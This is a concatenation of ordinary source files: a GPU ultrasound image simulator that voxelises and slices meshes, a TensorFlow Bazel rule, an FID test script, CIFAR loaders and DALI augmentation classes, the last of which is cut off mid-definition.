self.voxel_size,
margin,
save_dir=data_dir,
file_name=binary_name)
# Allocate to dictionary with bounding box
volume_dict[model_name] = [volume, bound_box]
# Allocate final results
self.binary_volumes = volume_dict
return 0
def preallocate_bin_gpu_var(self,
image_num,
downsampling):
"""
Function to generate local gpu variables that will
be used for simulation from binary volumes. Variable
sizes depend on the config parameters.
g_ prefix indicates gpu variables
:param image_num: maximum number of images to be simulated
:param downsampling: downsampling value on image dimensions
per call
"""
# First check if current image variables are empty or not,
# (if they have been set before). If they are not, reset
if self.g_variables:
self.g_variables = []
if self.image_variables:
self.image_variables = []
# Check if downsampling is at least 1
if downsampling < 1:
raise ValueError("Downsampling must be greater than 1")
# Check if maximum number of images is valid
if not isinstance(image_num, int) or image_num <= 0:
raise ValueError('image_num must be positive integer')
# Now, choose between curvilinear and linear array
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
# For the curvilinear case, get
# geometrical parameters of fan shape as a float:
# 0-Angular ray resolution, 1-ray depth resolution, 2-angle aperture
# 3-ray depth, 4-ray offset to origin, 5-ray offset to image top
fan_parameters = np.array(self.config["simulation"]["fan_geometry"])
fan_parameters[0] = np.deg2rad(fan_parameters[0])
fan_parameters[2] = np.deg2rad(fan_parameters[2])
fan_parameters[3:6] = fan_parameters[3:6] * fan_parameters[1]
fan_parameters = fan_parameters.astype(np.float32)
# Append them to image variables (becomes index 0)
self.image_variables.append(fan_parameters)
# Get point cloud dimensions from fan parameters, necessary to
# know how many points will be sampled and used for intersection
coord_w = len(np.arange((-fan_parameters[2] / 2).astype(np.float32),
(fan_parameters[2] / 2).astype(np.float32),
fan_parameters[0]))
coord_h = len(np.arange(fan_parameters[4],
fan_parameters[4] + fan_parameters[3],
fan_parameters[1]))
# Append to image variables (becomes index 1)
slice_dim = np.array([coord_w, coord_h, image_num]).astype(np.int32)
self.image_variables.append(slice_dim)
# Through downsampling, obtain the output image dimensions
# and append (becomes index 2)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 3)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Knowing these dimensions, now append preallocate all
# GPU variables. First, 2D and 3D positions of the fans
# (become index 0 and 1, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The 3D positions, with the same size (becomes index 1)
self.g_variables.\
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The fan intersection with the volume (becomes index 2)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim)),
dtype=np.int32))
# Now, the outputs, with image_dim as dimension, both images
# and fan shape outline used for interpolation (become
# index 3 and 4, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=bool))
# Finally, determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(coord_w, coord_h)
self.blockdim = np.array([blockdim_x, blockdim_y])
elif transducer_type == "linear":
# For the linear case, variable definition is simpler
# Get rectangular plane dimensions first, and append
# to image variables (becomes index 0)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 1)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Now preallocate gpu variables, first the positions
# (becomes index 0)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim) * 3),
dtype=np.float32))
# Secondly, volume intersections that do not
# need to be warped in this case (becomes index 1)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
# Finally, determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(image_dim[0],
image_dim[1])
self.blockdim = np.array([blockdim_x, blockdim_y])
else:
# In case the transducer is another option
raise ValueError("No valid transducer type!")
# To avoid repeating allocation code, allocate volumes now
# The volumes to be sliced, in a 1D array. These are added
# at the end, as their indexes start from 5 in curvilinear case,
# and 2 linear case
for model in range(len(self.config["simulation"]["simulation_models"])):
# Check if model index m is to be considered
if self.config["simulation"]["simulation_models"][model]:
# Define its dictionary key
model_name = self.config["models"]["files"][model]
model_name = model_name.replace(" ", "_")
# Reshape it, and append it as a variable
volume = self.binary_volumes[model_name][0].copy()
volume_dim = volume.shape
volume = np.swapaxes(volume, 0, 1)
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(bool)))
# Also, append their bound box, shape and display color
# to image variables becomes a variable index starting
# from 4 in curvilinear, and 2 in linear (a tuple of 3 arrays)
model_color = self.config["simulation"]["colors"][model]
self.image_variables.append([self.binary_volumes[model_name][1],
volume_dim, model_color])
self.image_num = image_num
self.downsampling = downsampling
def simulate_image(self,
poses=np.eye(4),
image_num=1,
out_points=False):
"""
Function that generates a set of images from multiple
segmented models stored in self.config. Uses the function
slice_volume or linear_slice_volume
:param poses: array with probe poses
:param image_num: number of images to simulate
:param out_points: bool to get sampling positions or not
:return: positions in 3D, stack of resulting images with
multiple labels, and stack with colored images for
visualisation
"""
# Check if number of images matches number of poses
if poses.shape[1] / 4 != image_num:
raise ValueError("Input poses do not match image number!")
# In order to not fix the number of images to be used, check
# if image num is the same as the one considered by the object
# If they differ, preallocate again
current_image_num = self.image_num
if image_num != current_image_num:
self.preallocate_bin_gpu_var(image_num=image_num,
downsampling=self.downsampling)
print("Number of images was changed from " +
str(current_image_num) + " to " + str(image_num))
# Get config parameters for the simulation
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
image_dim = self.image_variables[2]
aux_index = 4
else:
# Linear case
image_dim = self.image_variables[0]
aux_index = 2
voxel_size = np.array([self.voxel_size,
self.voxel_size,
self.voxel_size])
# Prepare outputs
visual_images = np.zeros((image_dim[1], image_dim[0], 3, image_num))
simulation_images = np.zeros((image_dim[1], image_dim[0], image_num))
# Go through the models that should be intersected
for model in range(len(self.binary_volumes)):
# Go through each stored model
if transducer_type == "curvilinear":
points, images, mask = slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
model,
voxel_size,
poses,
out_points)
else:
points, images = linear_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
model,
voxel_size,
poses,
out_points)
# Add images to output
simulation_images = simulation_images\
+ images.astype(int)*(model + 1)
# Create colored images, just for visualisation
model_color = self.image_variables[aux_index + model][2]
visual_images[:, :, 0, :] = visual_images[:, :, 0, :] + \
images * model_color[0] / 255
visual_images[:, :, 1, :] = visual_images[:, :, 1, :] + \
images * model_color[1] / 255
visual_images[:, :, 2, :] = visual_images[:, :, 2, :] + \
images * model_color[2] / 255
# Add grey outline, in case the array is curvilinear
if transducer_type == "curvilinear":
outline = np.repeat(1 - mask[:, :, np.newaxis], 3, axis=2).\
astype(int)*210/255
outline = np.repeat(outline[:, :, :, np.newaxis],
image_num, axis=3)
visual_images = visual_images + outline
return points, simulation_images, visual_images
def show_plane(self,
image_array,
image_index,
point_array):
"""
Show intersection and plane geometry in 3D model
No suitable way of showing meshes, so this method
needs improvements
:param image_array: stack of images to show
:param image_index: stack index of image to be shown
:param point_array: point cloud with stack of plane points
"""
# Get number of points per plane
points_per_plane = int(point_array.shape[0]/image_array.shape[3])
# First, prepare figure
fig = plt.figure()
# Add 3D visualisation subplot
ax_3d = fig.add_subplot(121, projection='3d')
# Get the meshes to be plotted
for m_i in range(len(self.meshes.keys())):
# Add mesh to plot
if self.config["simulation"]["simulation_models"][m_i]:
model_name = self.config["models"]["files"][m_i]\
.replace(" ", "_")
model = self.meshes[model_name]
# Get color and opacity of models
model_color = np.array([self.config["simulation"]
["colors"][m_i]])/255
# model_opacity = np.array([self.config["simulation"]
# ["opacity"][model]])
ax_3d.scatter(model.vertices[0:-1:1, 0],
model.vertices[0:-1:1, 1],
model.vertices[0:-1:1, 2],
color=model_color,
alpha=0.5)
# Add plane point cloud
ax_3d.scatter(point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 0],
point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 1],
point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 2],
color=[0, 0, 0])
# Add 2D visualisation subplot
ax_2d = fig.add_subplot(122)
ax_2d.imshow(image_array[:, :, :, image_index])
plt.show()
return 0
def voxelise_mesh(input_mesh,
voxel_size,
margin=None,
save_dir=None,
file_name=None):
"""
Method that generates binary volume from an input mesh
:param input_mesh: triangular mesh to be voxelised
:param voxel_size: 3D voxel size
:param margin: 3D vector with additional voxel margin
around the bounding box of the input mesh
:param save_dir: directory to save file
:param file_name: name of file to save
:return: 3D binary volume
"""
if margin is None:
margin = np.array([0, 0, 0])
bound_box = input_mesh.get_bounding_box()
# Add margins
bound_box[0, :] = bound_box[0, :] - margin
bound_box[1, :] = bound_box[1, :] + margin
# Define output size (x, y, z)
dimensions = (np.ceil(bound_box[1, :])
- np.floor(bound_box[0, :]))/voxel_size
# Round and convert to integer
bin_dimensions = np.ceil(dimensions).astype(int)
# Create empty volume
bin_volume = np.zeros(bin_dimensions, dtype=bool)
# Get point coordinates and faces
v_x = input_mesh.vertices[:, 0]
v_y = input_mesh.vertices[:, 1]
v_z = input_mesh.vertices[:, 2]
t_x = v_x[input_mesh.faces]
t_y = v_y[input_mesh.faces]
t_z = v_z[input_mesh.faces]
# Get face/triangles bounding box
tx_min = np.amin(t_x, axis=1)
ty_min = np.amin(t_y, axis=1)
tz_min = np.amin(t_z, axis=1)
tx_max = np.amax(t_x, axis=1)
ty_max = np.amax(t_y, axis=1)
tz_max = np.amax(t_z, axis=1)
# 1-Intersecting XY plane
xyplane_x = np.arange(np.floor(bound_box[0, 0]),
np.ceil(bound_box[1, 0]), voxel_size)
xyplane_y = np.arange(np.floor(bound_box[0, 1]),
np.ceil(bound_box[1, 1]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_xy = np.empty((0, 3), dtype=float)
for x_ind in xyplane_x:
for y_ind in xyplane_y:
# Get intersectable triangles
inter_t = np.asarray(np.where((tx_min <= x_ind)
& (tx_max >= x_ind)
& (ty_min <= y_ind)
& (ty_max >= y_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([x_ind, y_ind, 0])
direction = np.array([0, 0, 1])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_xy = np.append(inter_xy, [intersection], axis=0)
print('Intersected XY plane')
# 2-Intersecting XZ plane
xzplane_x = np.arange(np.floor(bound_box[0, 0]),
np.ceil(bound_box[1, 0]), voxel_size)
xzplane_z = np.arange(np.floor(bound_box[0, 2]),
np.ceil(bound_box[1, 2]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_xz = np.empty((0, 3), dtype=float)
for x_ind in xzplane_x:
for z_ind in xzplane_z:
# Get intersectable triangles
inter_t = np.asarray(np.where((tx_min <= x_ind)
& (tx_max >= x_ind)
& (tz_min <= z_ind)
& (tz_max >= z_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([x_ind, 0, z_ind])
direction = np.array([0, 1, 0])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_xz = np.append(inter_xz, [intersection], axis=0)
print('Intersected XZ plane')
# 3-Intersecting YZ plane
yzplane_y = np.arange(np.floor(bound_box[0, 1]),
np.ceil(bound_box[1, 1]), voxel_size)
yzplane_z = np.arange(np.floor(bound_box[0, 2]),
np.ceil(bound_box[1, 2]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_yz = np.empty((0, 3), dtype=float)
for y_ind in yzplane_y:
for z_ind in yzplane_z:
# Get intersectable triangles
inter_t = np.asarray(np.where((ty_min <= y_ind)
& (ty_max >= y_ind)
& (tz_min <= z_ind)
& (tz_max >= z_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([0, y_ind, z_ind])
direction = np.array([1, 0, 0])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_yz = np.append(inter_yz, [intersection], axis=0)
print('Intersected YZ plane')
# Allocate indexes to binary image
final_intersections = np.vstack((inter_xy, inter_xz, inter_yz))
final_intersections = np.ceil((final_intersections -
np.floor(bound_box[0, :]))/voxel_size) - 1
# While there is no faster option
for plane in range(final_intersections.shape[0]):
x_ind = final_intersections[plane, 0].astype(int)
y_ind = final_intersections[plane, 1].astype(int)
z_ind = final_intersections[plane, 2].astype(int)
bin_volume[x_ind, y_ind, z_ind] = True
# Finally, go through z planes and fill vessels
for plane in range(bin_volume.shape[2]):
z_slice = bin_volume[:, :, plane].astype(int)
closed_z_slice = fill(z_slice)
bin_volume[:, :, plane] = closed_z_slice.astype(bool)
if os.path.isdir(save_dir):
if file_name is None:
file_name = 'binary_map.npy'
np.save(save_dir + file_name, bin_volume)
return bin_volume
def ray_triangle_intersection(origin,
direction,
xyz):
"""
Checks if ray defined by origin o and
direction d intersects triangle with coordinates
3 x 3 in xyz
:param origin: origin of ray
:param direction: direction of ray
:param xyz: coordinates of triangle in 3 x 3 matrix
:return: boolean with intersection
"""
epsilon = 0.00001
p_0 = xyz[0, :]
p_1 = xyz[1, :]
p_2 = xyz[2, :]
e_1 = p_1 - p_0
e_2 = p_2 - p_0
q_value = np.cross(direction, e_2)
a_value = np.dot(e_1, q_value)
# Check if ray is parallel to face
if np.abs(a_value) < epsilon:
return 0, 0
f_value = 1 / a_value
s_value = origin - p_0
u_value = f_value * np.dot(s_value, q_value)
# Check if intersection is not within face
if u_value < 0:
return 0, 0
r_value = np.cross(s_value, e_1)
v_value = f_value * np.dot(direction, r_value)
# Check again
if (v_value < 0) | (v_value + u_value > 1):
return 0, 0
dist = f_value * np.dot(e_2, r_value)
flag = 1
return flag, dist
def slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
model_index,
voxel_size,
poses,
out_points=False):
"""
Function that slices a binary volume with fan shaped sections
section defined by poses of a curvilinear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - fan positions in 2D
1 - fan positions in 3D
2 - intensities mapped in fan positions
3 - the target intensity volume
4 - the output images in image space
5 - the 2D fan mask outline
:param blockdim: block dimensions for CUDA kernels
:param model_index: index of model in g_variables to be sliced
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get fan positions or not
:return: positions in 3D, stack of resulting images, image
with fan shape outline
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
fan_parameters = image_variables[0]
slice_dim = image_variables[1]
image_dim = image_variables[2]
pixel_size = image_variables[3]
# Define voxel size for intersection of binary volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(slice_dim[0] / blockdim_x)
griddim_y = int(slice_dim[1] / blockdim_y)
image_num = int(slice_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
# And an array to offset fan position per image plane
offset_array = np.zeros((1, 3 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# Allocate the offset
offset_array[0, 3*p_ind:3*(p_ind+1)] = pose[0:3, 1]
# 1-Run position computation kernel, acts on index 0 and 1 of
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("transform")
# Then run it
transform_kernel(g_variables[1],
g_variables[0],
drv.In(pose_array),
drv.In(offset_array),
drv.In(fan_parameters),
np.int32(image_num),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(slice_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[1].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(slice_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
bound_box = image_variables[4 + model_index][0]
vol_dim = image_variables[4 + model_index][1]
binary_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('slice')
# Then run it, using the preallocated g_variable model
slice_kernel(g_variables[2],
g_variables[1],
g_variables[5 + model_index],
drv.In(binary_volume_dims),
drv.In(voxel_size),
drv.In(slice_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# 3-Map pixels to fan like image
# Define bounds of image output in 2d coordinates as float
image_bounding_box = np.array([-image_dim[0] * pixel_size[0]/2 * 1000,
0, image_dim[0],
image_dim[1]]).astype(np.float32)
# Allocate output images, the binary image as an int, and the
# fan mask as a boolean, these mus be in CPU
binary_images = np.empty((1, np.prod(image_dim)), dtype=np.int32)
mask = np.empty((1, np.prod(image_dim)), dtype=bool)
# Call kernel from file
map_kernel = cuda_modules.get_function('map_back')
# Then run it, multiplying coordinates value by a 1000, in order
# to avoid sampling errors
map_kernel(g_variables[3],
g_variables[4],
g_variables[2],
g_variables[0]*1000,
drv.In(slice_dim),
drv.In(image_bounding_box),
drv.In(pixel_size*1000),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
binary_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(bool)
# Gather results
# Gather the results
g_variables[3].get(binary_images)
g_variables[4].get(mask)
# Flush the vector
g_variables[3].fill(0)
for plane in range(image_num):
# Get image and reshape it
current_image = binary_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[0], image_dim[1]).T
# Morphological operations to clean image
current_image = erode(current_image, iterations=2)
current_image = dilate(current_image, iterations=2)
# Allocate to output
binary_image_array[:, :, plane] = current_image
# Get the fan mask, mostly used for visualisation
mask = mask[0, 0:im_size]
mask = mask.reshape(image_dim[0], image_dim[1]).T
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions, plus an outline of the fan
return positions_3d, binary_image_array, mask
def linear_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
model_index,
voxel_size,
poses,
out_points=False):
"""
Function that slices a binary volume with rectangular sections
defined by poses of a linear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - rectangle positions in 3D
1 - rectangular intensity images
2 - the target intensity volume
:param blockdim: block dimensions for CUDA kernels
:param model_index: index of model in g_variables to be sliced
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get rectangular positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
image_dim = image_variables[0]
pixel_size = image_variables[1]
# Define voxel size for intersection of binary volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(image_dim[0] / blockdim_x)
griddim_y = int(image_dim[1] / blockdim_y)
image_num = int(image_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# 1-Run position computation kernel, acts on index 0
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("linear_transform")
# Then run it
transform_kernel(g_variables[0],
drv.In(pose_array),
drv.In(pixel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(image_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[0].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(image_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
bound_box = image_variables[2 + model_index][0]
vol_dim = image_variables[2 + model_index][1]
binary_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Allocate space for output images, in CPU
binary_images = np.empty((1, np.prod(image_dim)), dtype=np.int32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('slice')
# Then run it
slice_kernel(g_variables[1],
g_variables[0],
g_variables[2 + model_index],
drv.In(binary_volume_dims),
drv.In(voxel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
binary_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(bool)
# Gather the results
g_variables[1].get(binary_images)
for plane in range(image_num):
# Get each image and reshape it
current_image = binary_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[1], image_dim[0])
# Morphological operations to clean image
current_image = erode(current_image, iterations=2)
current_image = dilate(current_image, iterations=2)
# Allocate to output
binary_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, binary_image_array
def show_volume(bin_volume):
"""
Function that scrolls through volume in Z direction
:param bin_volume: binary volume to show
"""
if len(bin_volume.shape) != 3:
raise ValueError("Not a valid volume")
# Display z slices of volume
for z_ind in range(bin_volume.shape[2]):
plt.cla()
z_slice = bin_volume[:, :, z_ind].astype(int)
plt.title('Slice number ' + str(z_ind))
plt.imshow(z_slice, cmap='gray')
plt.pause(.001)
``` |
{
"source": "jraman/tensorflow",
"score": 2
} |
#### File: third_party/remote_config/remote_platform_configure.bzl
```python
def _remote_platform_configure_impl(repository_ctx):
repository_ctx.template(
"BUILD",
Label("@org_tensorflow//third_party/remote_config:BUILD.tpl"),
{
"%{container_image}": repository_ctx.attr.container_image,
},
)
remote_platform_configure = repository_rule(
implementation = _remote_platform_configure_impl,
attrs = {
"container_image": attr.string(mandatory = True),
},
)
``` |
{
"source": "jramapuram/async_fid",
"score": 3
} |
#### File: jramapuram/async_fid/test_async.py
```python
import os
import time
import numpy as np
# create some random data to post to both the calls
rv = np.random.rand(10000, 28, 28, 1)
def async_test(f, task='mnist'):
"""Creates a sync-fid object and tests random data and the test set.
:param task: string value for task
:param data_dir: the directory to store the data
:returns: nothing
:rtype: None
"""
f.post(fake_images=rv,
lbda=lambda s: print("\n[{}]\tFID for random data vs. test-set : {}.".format(task, s)),
dataset_str=task
)
print('posted async item!')
# post your own data as well directly, FID internally auto-rescales to 255
f.post_with_images(fake_images=f.test_dict[task],
real_images=f.test_dict[task],
lbda=lambda s: print("\n[{}]\tFID for test-set vs. test-set : {}\n".format(task, s)))
print('posted async item!')
from fid.fid import AsyncFID as FID
f = FID(normalize=True, force_cpu=False)
f.add_dataset(dataset_str='mnist', root_folder='./mnist')
# Note that the async FID returns here instantly instead of blocking
async_test(f, task='mnist')
# we need to introduce a sleep here to see this message after the garbage mound of TF bla
time.sleep(10)
f.terminate() # kills the inner process **AFTER** finishing the queue of tasks
print("\nasync tests spawned, waiting for spawned process to terminate...")
# join blocks the current thread until f terminates.
f.join()
``` |
{
"source": "jramapuram/datasets",
"score": 3
} |
#### File: jramapuram/datasets/cifar.py
```python
import functools
from torchvision import datasets
from .abstract_dataset import AbstractLoader
class CIFAR10Loader(AbstractLoader):
"""Simple CIFAR10 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR10, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR10, root=path, train=False, download=True)
super(CIFAR10Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 10 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
class CIFAR100Loader(AbstractLoader):
"""Simple CIFAR100 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR100, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR100, root=path, train=False, download=True)
super(CIFAR100Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 100 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
```
#### File: jramapuram/datasets/dali_imagefolder.py
```python
import os
import torch.distributed as dist
import nvidia.dali.ops as ops
import nvidia.dali.types as types
from copy import deepcopy
from typing import Optional
from nvidia.dali.pipeline import Pipeline
from nvidia.dali.plugin.pytorch import DALIClassificationIterator, DALIGenericIterator
from .abstract_dataset import AbstractLoader
# For reference
IMAGENET_MEAN = [0.485 * 255, 0.456 * 255, 0.406 * 255]
IMAGENET_STD = [0.229 * 255, 0.224 * 255, 0.225 * 255]
class Mux(object):
"""DALI doesn't support probabilistic augmentations, so use muxing."""
def __init__(self, prob=0.5):
self.to_bool = ops.Cast(dtype=types.DALIDataType.BOOL)
self.rng = ops.CoinFlip(probability=prob)
def __call__(self, true_case, false_case):
"""Use masking to mux."""
condition = self.to_bool(self.rng())
neg_condition = condition ^ True
return condition * true_case + neg_condition * false_case
class RandomGrayScale(object):
"""Parallels RandomGrayscale from torchvision. Written by @klecki"""
def __init__(self, prob=0.5, cuda=True):
self.coin = ops.CoinFlip(probability=prob)
self.cast_fp32 = ops.Cast(dtype=types.FLOAT)
self.hsv = ops.Hsv(device="gpu" if cuda else "cpu", dtype=types.UINT8)
def __call__(self, images):
saturate = self.coin()
saturate_fp32 = self.cast_fp32(saturate)
converted = self.hsv(images, saturation=saturate_fp32)
return converted
class RandomHorizontalFlip(object):
"""Parallels RandomHorizontalFlip from torchvision."""
def __init__(self, prob=0.5, cuda=True):
self.mux = Mux(prob=prob)
self.op = ops.Flip(device="gpu" if cuda else "cpu",
horizontal=1,
depthwise=0,
vertical=0)
def __call__(self, images):
return self.mux(true_case=self.op(images), false_case=images)
class ColorJitter(object):
"""Parallels torchvision ColorJitter."""
def __init__(self, brightness=0.8, contrast=0.8, saturation=0.2, hue=0, prob=0.8, cuda=True):
"""Parallels the torchvision color-jitter transform.
Args:
brightness (float or tuple of float (min, max)): How much to jitter brightness.
brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]
or the given [min, max]. Should be non negative numbers.
contrast (float or tuple of float (min, max)): How much to jitter contrast.
contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]
or the given [min, max]. Should be non negative numbers.
saturation (float or tuple of float (min, max)): How much to jitter saturation.
saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]
or the given [min, max]. Should be non negative numbers.
hue (float or tuple of float (min, max)): How much to jitter hue.
hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].
Should have 0<= hue <= 0.5 or -0.5 <= min <= max <= 0.5.
prob (float): probability of applying the ColorJitter transform at all.
cuda (bool): if true uses the GPU
"""
# This RNG doesn't actually work dynamically
self.mux = Mux(prob=prob)
# Generates uniform values within appropriate ranges
self.brightness = ops.Uniform(range=(max(0, 1.0 - brightness), 1.0 + brightness))
self.contrast = ops.Uniform(range=(max(0, 1.0 - contrast), 1.0 + contrast))
self.saturation = ops.Uniform(range=(max(0, 1.0 - saturation), 1.0 + saturation))
self.hue = ops.Uniform(range=(-hue, hue))
# The actual transform
self.op = ops.ColorTwist(device="gpu" if cuda else "cpu",
